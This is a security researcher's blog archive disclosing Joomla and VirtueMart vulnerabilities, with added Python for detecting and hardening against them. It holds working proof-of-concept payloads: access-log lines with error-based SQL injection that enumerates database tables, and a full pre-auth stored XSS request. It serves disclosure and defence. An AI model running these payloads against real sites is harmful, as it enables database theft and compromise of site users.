
Sunday, 27 December 2015

Joomla CVE-2015-7857 writeup

(I wrote this as a 'note' on 14.12.2015, but since all the information is already public,
below you will find a proof of concept and a short write-up of the vulnerability described in this CVE.)


Tuesday, 23 December 2014

[EN] Vulnerabilities in popular plugins - Joomla case

Hi,

during the last few months I was involved in multiple pentests (web apps, infrastructures) in multiple countries. That's why I haven't posted anything new here (almost since last May ;) ).

For all of you who want to talk with me (faster than via email), you can also reach me on Twitter.

For all of you who are watching my blog - I have something new for you. A little mini-article series where I describe multiple (mostly SQL Injection) vulnerabilities in multiple popular plugins (this time for Joomla).

If you want more (for example also for other popular content management systems), feel free to write to me.

Comments, ideas are welcome as always.

The article is now available here,
and also at PacketStormSecurity.

Enjoy ;)

Saturday, 3 May 2014

How I met your Joomla 3.2.2 SQL Injection

In March this year I found that Joomla 3.2.2 with the default data
installed is vulnerable to an SQL Injection attack.

After a few lines from the April log,
you should know how it was done.

root@poc:/var/log/apache2# tail -n 1 -f access.log
10.149.14.63 - - [23/Apr/2014:22:32:44 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6661 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:45 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+0%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6727 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:45 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+1%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6745 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:46 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+2%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6751 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:46 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+3%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6748 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:47 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+4%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6730 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:47 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+5%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6739 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:48 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+6%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6754 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:48 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+7%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6730 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:49 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+8%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6760 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:49 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+9%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6751 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"


Joomla 3.2.2 error
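The log above is an error-based ("double query") injection: the payload wraps the attacker's subselect in COUNT(*)/GROUP BY over FLOOR(RAND(0)*2), which makes MySQL fail with a duplicate-key error (code 1062, the same number that appears in the status field of the lines above) whose message carries the extracted value. As an added example that is not part of the original post, the Python below parses such access-log lines, URL-decodes the request, flags that signature and decodes the 0x... hex literals, which is how you read the targeted schema name out of a log line without sending anything to the site. The two log lines embedded in it are constructed copies (the first is the post's payload with the User-Agent shortened, the second a benign request to the same page); nothing else is assumed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: the first line is the payload from the post above (User-Agent
# shortened), the second a benign request. Not taken verbatim from the post's log.
SAMPLE_LOG = r'''10.149.14.63 - - [23/Apr/2014:22:32:44 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6661 "-" "Mozilla/5.0"
10.149.14.63 - - [23/Apr/2014:22:33:10 -0500] "GET /k/joomla322/index.php/single-contact/1 HTTP/1.1" 200 6402 "-" "Mozilla/5.0"
'''

# Combined log format: ip ident user [ts] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+) ')

# COUNT(*) + GROUP BY over a key containing FLOOR(RAND(0)*2) makes MySQL raise
# "Duplicate entry ... for key 'group_key'" (error 1062); the duplicated value is the
# attacker's concat()ed subselect, so the error message itself leaks the data.
DOUBLE_QUERY_RE = re.compile(r'floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)', re.I)
GROUP_BY_RE = re.compile(r'\bgroup\s+by\b', re.I)
HEX_LITERAL_RE = re.compile(r'0x([0-9a-f]{2,})\b', re.I)


def decode_hex_literals(sql):
    """Map each 0x... literal in a decoded query to its ASCII text, when it is printable."""
    out = {}
    for m in HEX_LITERAL_RE.finditer(sql):
        digits = m.group(1)
        if len(digits) % 2:
            continue
        raw = bytes.fromhex(digits)
        if all(32 <= b < 127 for b in raw):
            out[m.group(0)] = raw.decode('ascii')
    return out


def classify(path):
    """URL-decode a request path once and look for the error-based signature in it."""
    decoded = unquote_plus(path)
    return {
        'decoded': decoded,
        'double_query': bool(DOUBLE_QUERY_RE.search(decoded) and GROUP_BY_RE.search(decoded)),
        'information_schema': 'information_schema' in decoded.lower(),
        'hex_literals': decode_hex_literals(decoded),
    }


def scan(log_text):
    """One finding per access-log line whose request carries the double-query signature."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        info = classify(m.group('path'))
        if info['double_query']:
            findings.append({'ip': m.group('ip'), 'ts': m.group('ts'),
                             'status': m.group('status'), **info})
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']} {f['ts']} status={f['status']}")
        print("  decoded:", f['decoded'])
        print("  hex literals:", f['hex_literals'])
```

Run it as-is to see the finding; in a real pipeline feed it the whole access.log and alert on any match, since legitimate traffic never carries FLOOR(RAND(0)*2) together with GROUP BY in a URL. The decoded hex literal tells you which schema the attacker was enumerating.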


Here is why I decided to publish it. And here you will find even more.


Enjoy
o/

Monday, 3 March 2014

[EN] Joomla 3.2.2 pre-auth persistent XSS

Maybe you want to verify... ;)

# ==============================================================
# Title ...| Persistent pre-auth XSS in Joomla
# Version .| Joomla 3.2.2
# Date ....| 3.03.2014
# Found ...| HauntIT Blog
# Home ....| http://www.joomla.org
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/cms/joomla/index.php/single-contact HTTP/1.1
Host: 10.149.14.62

(...)
Content-Length: 288

jform%5Bcontact_name%5D=aaaaaa&jform%5Bcontact_email%5D=a"><body%20onload=alert(123)>@b.com&jform%5Bcontact_subject%5D=asdas&jform%5Bcontact_message%5D=dasdasdasd&jform%5Bcontact_email_copy%5D=1&option=com_contact&task=contact.submit&return=&id=1%3Aname&e328236e3b63be0be16a0d0d841f63f9=1
---<request>---



Joomla XSS - request


And:

---<response>---
(...)
 title="<strong>Email</strong><br />Email for contact">Email<span class="star">&#160;*</span></label></div>
                <div class="controls"><input type="email" name="jform[contact_email]" class="validate-email" id="jform_contact_email" value="a"><body onload=alert(123)>@b.com" size="30" required aria-required="true" /></div>
            </div>
(...)
---<response>---
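The response above shows exactly where the breakout happens: the submitted email is written back into value="..." without escaping, so the " in the payload closes the attribute and <body onload=...> becomes a tag of its own. The Python below is an added example, not Joomla's code: it renders the attribute both the vulnerable way and with attribute-context escaping (html.escape with quote=True, the equivalent of PHP's htmlspecialchars with ENT_QUOTES), counts the tag openers a browser would see in each, and adds a conservative email-shape check (an assumption, not Joomla's own validator) that would refuse this value before it is ever re-rendered.

```python
import html
import re

# The value from the request above: a quote closes the attribute, then a new tag follows.
PAYLOAD = 'a"><body onload=alert(123)>@b.com'

FIELD = 'jform[contact_email]'


def render_vulnerable(value):
    """Mirrors the response above: the submitted value is echoed into the attribute unescaped."""
    return f'<input type="email" name="{FIELD}" value="{value}" />'


def render_hardened(value):
    """Escape for an attribute context; quote=True turns " into &quot; and ' into &#x27;."""
    return f'<input type="email" name="{FIELD}" value="{html.escape(value, quote=True)}" />'


TAG_OPEN_RE = re.compile(r'<[A-Za-z]')


def count_tags(markup):
    """Number of tag openers a browser would see: one for the input, more means a breakout."""
    return len(TAG_OPEN_RE.findall(markup))


# Conservative address shape (assumption: not Joomla's validator). Rejecting the value
# early is good hygiene, but the re-rendered form still needs the escaping above.
EMAIL_RE = re.compile(r'^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$')


def looks_like_email(value):
    """True for a plausibly shaped address, False for the payload above."""
    return bool(EMAIL_RE.match(value))


if __name__ == '__main__':
    print('vulnerable:', render_vulnerable(PAYLOAD), count_tags(render_vulnerable(PAYLOAD)))
    print('hardened:  ', render_hardened(PAYLOAD), count_tags(render_hardened(PAYLOAD)))
    print('valid email?', looks_like_email(PAYLOAD))
```

Validation alone does not close this: the form is re-rendered with the rejected value, so whatever is echoed back has to be escaped for the attribute it lands in.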


From Burp it looks like this:
 

XSS - view from Burp

Response at the page:




# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

Thursday, 20 December 2012

[EN] Joomla 3.0.2 leaked again

Joomla 3.0.2 is vulnerable to an SQL error leak.

If a user supplies malformed data in the cookie (by appending a value to the md5 string), then
an SQL error is leaked and Joomla's table-name prefix can be read.

Add 'malformed' value here - Burp

... and now you can see an error from the <prefix>_session table:

SQL Leak - now you know what is the prefix

:)

If you look at this request/response you will see that those screens were created from the 'administrator' link. To stop comments like 'not useful because it's only possible as admin' - try to reproduce this as a normal (registered) or pre-auth user. ;)

Another place where a user can input malformed data looks like this:

SQL Leak


cheers

Sunday, 3 June 2012

[EN] Joomla 2.5.4 - remote user logout bug

Yes, it seems that in the (still) latest Joomla (2.5.4) we have a so-called bug.

By sending a malformed request to the user, we are able to 'log out' that user.

Why could this be used for an attack? Well, a bad guy can change (deface) your company's site
and add a password stealer there (to the PHP code, for example).

Now he can log out all users like a sniper. ;]

(Yes yes, there is a way to do the same from the admin panel, but who cares...? ;))

I want to finish some tests right now, and in a few hours there will be an update here.

...and thanks for watching during all this break ;)

Cheers o/
;)

Monday, 30 April 2012

[EN] Joomla 2.5.4 "SQL Info leak"

Ok,

so maybe you (still) have 'display_errors=On' (or something similar) on your site...

So try this on your localhost:

It's important to mention that if you (the 'attacker') get this error,
you are able to see the 'randomized' Joomla table prefix for some table names.
Look at the JOIN query in the screenshot.

Cheers! o/

Monday, 23 April 2012

[EN] Quick news

Hi,

today only one piece of "quick news" ;)

The details will be here as soon as possible, but for "your information"
(and for "maybe this version is the version of your CMS and you need a quick patch" ;))
here is a list of a few vulnerabilities I found this month.
If you need it fast - let me know, as always, via e-mail ;)

So:
For 04.2012 (so far ;)):
01.04 - Joomla 2.5.3 Information disclosure
04.04 - JooDatabase SQL Injection
06.04 - VirtueMart 2.0.2 Information disclosure
07.04 - jNews - Information disclosure
07.04 - Joomla 2.5.4 - Multiple...
07.04 - nBill Lite - HTML Injection / XSS
07.04 - VirtueMart 2.0.2 Information disclosure
11.04 - eFront CMS 3.6.10 Information disclosure
11.04 - eFront CMS 4.6.10 - User enumeration
14.04 - ATutor 2.0.4 XSS
15.04 - Docebo LMS 3605 - HTML Injection
15.04 - Docebo LMS 3605 - SQL Injection
16.04 - e107 - reflected XSS
18.04 - HikaShop - Information disclosure


...to be continued... ;)


For 03.2012:
29.03 - gpEasy 2.3.3 XSS
27.03 - eXtreme-fusion 4.5 XSS
26.03 - Joomla 2.5.3 a few XSS
25.03 - Quick Cart 5.0 Information disclosure
25.04 - Quick Cart 5.0 CMS XSS
25.04 - Yaqas CMS (Alpha1) - multiple...
18.03 - Quick Cart 5.0 Information disclosure
18.03 - Quick CMS 4.0 XSS


So if you find here any CMS that you are using right now - let me know
if you want to test/patch it.

Tuesday, 10 April 2012

[EN] VirtueMart 2.0.2 Bugs - UPDATED!

Ok. :] (According to this ;))

I just found some information about a "possible SQL injection" in the latest VirtueMart (2.0.2).
So yes, it is true. ;) But I'm not the author of the 'public' one ;D So I asked myself how it happened... ;]

Why I decided to write this here: I found this vulnerability on 5.04 this year, and now I saw that someone published it (the same one) on 6.04 ;)
So that's why I want to share with you full, detailed technical information about this "possibility".
(...)

Anyway, besides the SQLi, there are other kinds of vulnerabilities in VM. I'm talking about information disclosure bugs.
If a user submits a 'wrong URL' then (because of wrong validation) he can get /path/to/your/virtuemart.
This information can be useful for other (extended) attacks.
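The 3.0.2 and 2.5.4 posts above and this VirtueMart note all describe the same class of issue: a PHP or database error rendered into the response discloses the random table prefix Joomla 1.6+ generates at install time, or the absolute path of the extension on disk. As an added example that is not code from any of these projects, the Python below scans response bodies for those two artefacts and for common MySQL error phrases. The sample responses are constructed for this example (the prefix k7f3x_ and the path are made up; they are not the ones in the screenshots).

```python
import re

# Constructed samples of the kind of error output these posts describe. They are not
# the screenshots from the posts: the prefix k7f3x_ and the path are made up.
SAMPLE_RESPONSES = {
    'session_error': "Table 'joomla.k7f3x_session' doesn't exist SQL=SELECT * FROM k7f3x_session "
                     "WHERE session_id = 'd41d8cd98f00b204e9800998ecf8427exx'",
    'join_error': "Unknown column 'a.foo' in 'on clause' SQL=SELECT a.* FROM k7f3x_content AS a "
                  "LEFT JOIN k7f3x_categories AS c ON c.id = a.catid",
    'php_warning': "<b>Warning</b>: Invalid argument supplied for foreach() in "
                   "<b>/var/www/html/shop/components/com_virtuemart/router.php</b> on line <b>88</b>",
    'clean': "<html><body><h1>Contact</h1></body></html>",
}

# Core table names every Joomla 1.6+ install has behind its random prefix.
CORE_TABLES = ('session', 'users', 'content', 'categories', 'extensions',
               'menu', 'assets', 'usergroups')
PREFIX_RE = re.compile(r'\b([A-Za-z0-9]+_)(?:' + '|'.join(CORE_TABLES) + r')\b')
# An absolute *.php path, the usual payload of a PHP warning or notice.
PATH_RE = re.compile(r'(/(?:[A-Za-z0-9._-]+/)+[A-Za-z0-9._-]+\.php)\b')
# Phrases that mark a raw MySQL error (Joomla appends the failing query after "SQL=").
SQL_ERROR_RE = re.compile(r"\bSQL=|doesn't exist|Unknown column|error in your SQL syntax", re.I)


def leaked_prefixes(body):
    """Distinct table prefixes visible in a response body."""
    return sorted(set(PREFIX_RE.findall(body)))


def leaked_paths(body):
    """Distinct absolute PHP file paths visible in a response body."""
    return sorted(set(PATH_RE.findall(body)))


def triage(body):
    """Summarise what one response leaks; all-empty means nothing was found."""
    return {
        'sql_error': bool(SQL_ERROR_RE.search(body)),
        'prefixes': leaked_prefixes(body),
        'paths': leaked_paths(body),
    }


if __name__ == '__main__':
    for name, body in SAMPLE_RESPONSES.items():
        print(name, triage(body))
```

The fix on the server side is to turn display_errors off and set Joomla's Error Reporting to None in Global Configuration; this scanner is the check you run afterwards, against every page that takes a cookie or URL parameter, to confirm that nothing leaks any more.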

This is my first post here, so once I find an 'add image' option, I will paste some screens here.

Cheers! ;)
Jakub

Details below:

1. Attacker can get information from the database.


2. Some information disclosure bugs:
(2.1 "Brute" input)
And output:






3. SQL Injection *tmp* screens:


And the last screen for "when did I find it":
 

Cheers! ;)

Saturday, 7 April 2012

[EN] SQL Injection in JooDatabase 1.7

Yes, 'the same' as what I found for VirtueMart a few hours ago.

By the way:
this post is only 'information' because I talked with the author and a new version will be out very, very soon! :D
Good and fast "Response Team", I like it ;]

Check it out here: http://joodb.feenders.de/download.html

Wednesday, 4 April 2012

[EN] VirtueMart 2.0.2 SQL Injection




The attack is possible as an "anonymous user".

Here you have the latest version.




More? ;)


Wednesday, 28 March 2012

[EN] Joomla 2.5.3 XSS


Yes, it's true. But for more information you must wait until the Joomla Security Team releases an update ;)

For now, this bug will be used only in new projects - as always ;)

Questions here ;)

Friday, 2 March 2012

[PL] Paweł's blog - thanks! ;)

One afternoon I got a message on one of the portals asking whether the information from the
Joomla newsletter was "my doing"... :>

Overall a very nice surprise, especially since the author decided to
mention it on his blog - which I consider a "compliment" - thanks! ;)

More information can be found here: http://blog.elimu.pl/

Friday, 3 February 2012

Joomla Disclosure (finally updated;))

In the last few days I wrote a few notes about Joomla security.

A few minutes ago one of you sent me a nice piece of information
about "my finding" ;P

As I saw, someone found the "Joomla XSS" before me, so
"mine" are only the "information disclosure" bugs listed.
Good. :)

So... Let's install latest Joomla! ;)

Once again: big thanks to Joomla Security Team.
For the response. For the knowledge. For the patience.

Cheers!


Tuesday, 31 January 2012

Thank You Joomla Security Team

Hi,


I should write here a little more, but maybe soon...

Now I can tell you about the Joomla Security Team: they are fast and full of knowledge! ;)

Watch them, soon there will be a new release.

Best regards!

Wednesday, 4 January 2012

[UPDATE] Joomla 1.7 Vulnerable to XSS

Let's start the Happy New Year with some reflection...

Reflection as in "reflected XSS" in the latest Joomla (1.7.3 at the time of this post).


The scenario of this attack is quite simple: the attacker must build a file containing the XSS and send it to the victim.
For reflected XSS, when we are talking about admins and users, the situation could look like this:
- (mail to admin) hi admin, this is my file.html, could it be added to my Joomla profile? (... or whatever else... ;) )
- wait, I must check it...
(...) and this is where the admin or another user could be exploited by this reflected XSS.

What do you think: should it be public? :D

UPDATE: (10.01.2012): 

As there is a nice example of how devastating reflected XSS can be, I present you
a link to a PoC I found here (it is a well-known Polish portal about security and IT, enjoy!).

The Pastebin link is an example of what Aditya Modha and Samir Shah found in WordPress 3.3.
Nice work! ;)

(more -> soon... ;) )

Sunday, 30 October 2011

What's with Joomla 1.7.2 Stable?

Yesterday I was checking the new Joomla CMS and when I logged in as an admin I found something "not correct" ;)


--- textarea ---
http://localhost/www/joomla/administrator/index.php?option=com_config&view=we have something here:


Joomla!

500 - An error has occurred.

View not found [name, type, prefix]: wehavesomethinghere, html, configView

Return to Control Panel

--- textarea ---
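The interesting detail in the error above is that the spaces in the view name are gone: what the URL carried as "we have something here" comes back as "wehavesomethinghere", so the name was run through an allowlist filter before it reached the error page. The Python below is an added example, not Joomla's code; the filter it uses (keep only letters, digits, underscore, dot and dash) is an assumption modelled on the behaviour shown, not copied from Joomla's source. It reproduces the message above and shows why the reflected name does not turn this 500 page into an XSS: anything that could open a tag or an attribute is stripped before reflection, which is the check worth doing on any reflected identifier.

```python
import html
import re

# Allowlist filter for identifiers such as a view name. Assumption: modelled on the
# behaviour above (spaces vanish), it keeps only letters, digits, '_', '.' and '-'.
CMD_DISALLOWED_RE = re.compile(r'[^A-Za-z0-9_.-]')


def filter_cmd(value):
    """Strip every character outside the identifier allowlist."""
    return CMD_DISALLOWED_RE.sub('', value)


def view_not_found_message(view, view_type='html', prefix='configView'):
    """Compose the error text in the shape the 500 page above shows, from the filtered name."""
    return f'View not found [name, type, prefix]: {filter_cmd(view)}, {view_type}, {prefix}'


def reflects_safely(value):
    """True when the filtered value contains nothing HTML-active, i.e. escaping changes nothing."""
    filtered = filter_cmd(value)
    return html.escape(filtered, quote=True) == filtered


if __name__ == '__main__':
    for probe in ('we have something here',
                  '<script>alert(1)</script>',
                  '"><img src=x onerror=alert(1)>'):
        print(repr(probe), '->', view_not_found_message(probe), '| safe:', reflects_safely(probe))
```

The allowlist is the right tool for an identifier that is looked up by name; for free text such as the contact form value in the XSS post above, output escaping is what protects the page, because there you cannot throw characters away.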

Will be updated... ;)